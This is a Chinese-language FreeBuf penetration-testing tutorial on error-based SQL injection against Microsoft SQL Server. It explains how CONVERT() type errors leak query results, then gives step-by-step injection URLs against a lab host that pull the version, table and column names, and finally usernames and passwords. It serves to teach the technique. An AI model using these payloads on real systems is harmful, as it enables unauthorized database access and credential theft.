freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

渗透测试之基础篇:Microsoft SQL Server手注之报错注入
渗透攻击红队 2021-08-31 09:12:46 236244

简介

今天主要分享下sql注入中的报错型,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现报错而导致sql注入。

convert()函数,CONVERT() 函数是把⽇期转换为新数据类型的通⽤函数。

语法:

CONVERT(data_type(length),data_to_be_converted,style)
注释 :
data_type(length) 转换为⽬标数据类型(带有可选的长度)。
data_to_be_converted 含有需要转换的值。
style 规定⽇期/时间的输出格式。

⽰例:

CONVERT(VARCHAR(19),GETDATE())
CONVERT(VARCHAR(10),GETDATE(),110) 
CONVERT(VARCHAR(11),GETDATE(),106)
CONVERT(VARCHAR(24),GETDATE(),113)

结果类似:

Dec 29 2008 11:45 PM
12-29-2008
29 Dec 08
29 Dec 2008 16:25:46.635

原理

对于convert(int,@@version)convert函数⾸先会执⾏第⼆个参数指定的SQL查询,然后尝试将查询结果转换为int类型。但是,由于这个SQL查询的结果是varchar类型,⽆法进⾏指定的转换,所以,convert函数会抛出 ⼀个SQL server错误消息,指出“SQL查询结果”⽆法转换为“int”类型,这样的话,攻击者就能得到的这个SQL查询的结果了。

满⾜条件的函数还有很多:

convert() 
file_name() 
db_name() 
col_name() 
filegroup_name()
object_name() 
schema_name() 
type_name() 
cast()

注⼊流程

查询基本信息

convert(int,@@version) 		获取版本信息 
convert(int,db_name()) 		数据库名字 
convert(int,user)			当前⽤户名 
convert(int,@@SERVERNAME)	获取有关服务器主机的信息

获取版本信息

http://192.168.159.135:8080/get.aspx?id=convert(int,@@version) 

图片

注意在这里我们直接吧函数放到id=的后面,因为id=1查询的是整型(int),而我们的convert(int,@@version)获取到的版本信息是字符型,所以他就会报错,从而爆出版本信息!

或者也可以使用这条语句也能实现上面的查询结果:

http://192.168.159.135:8080/get.aspx?id=1 and 1=(convert(int,@@version))

图片

获取当前数据库的表名

CONVERT(int,(select top 1 table_name from information_schema.columns))
http://192.168.159.135:8080/get.aspx?id=CONVERT(int,(select top 1 table_name from information_schema.columns))

图片

我们获取到了当前网站数据库的表名是:users

获取列名

convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(16进制的表名 as varchar)))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273  as varchar)))

图片

这样我们就获取到了第一个列名id

那么想要获取第二个列名我们就可以再后面加一个条件语句:and COLUMN_NAME != 'id'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id'))

图片

这样我们就获取到了第二个列名:username

想要获取第三个也是以此类推加条件语句:and COLUMN_NAME != 'username'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id' and COLUMN_NAME != 'username'))

图片

这样我们就获取到了第三个列名password

获取数据

我们按照上面的顺序获取到了网站的表名:users,列名有:idusernamepassword。很明显账号密码就在列名的usernamepassword,那么我们就可以获取数据了:

convert(int,(select top 1 列名 from 表名))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users))

图片

获取到了第一个username列名的第一个数据:saul

如果想获取到username里面的第二个数据那么就加一个条件语句:where username!='saul'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users where username!='saul'))

图片

这样就获取到的username的第二个数据!想要获取第二个就以此类推!

既然username我们获取到了两个:sauladmin!那么我们就要获取到他们的密码了!

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users))

图片

获取到第一个password列的值为:saul520

想要获取下一个就加一个where条件语句:where password!='saul520'

http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users where password!='saul520'))

图片

这样就获取到了第二个password的数据了!

至此Mssql报错注入就到此为止!

# 渗透测试 # SQL注入 # web安全 # MSSQL # MSSQL数据库
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 渗透攻击红队 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透攻击红队
渗透测试
渗透攻击红队 LV.4
微信公众号:渗透攻击红队
  • 12 文章数
  • 121 关注者
从外网 Weblogic 打进内网,再到约束委派接管域控
2021-11-12
渗透测试之内网攻防篇:使用 BloodHound 分析大型域内环境
2021-09-13
渗透测试之内网攻防篇:域森林下的信息搜集
2021-09-09
文章目录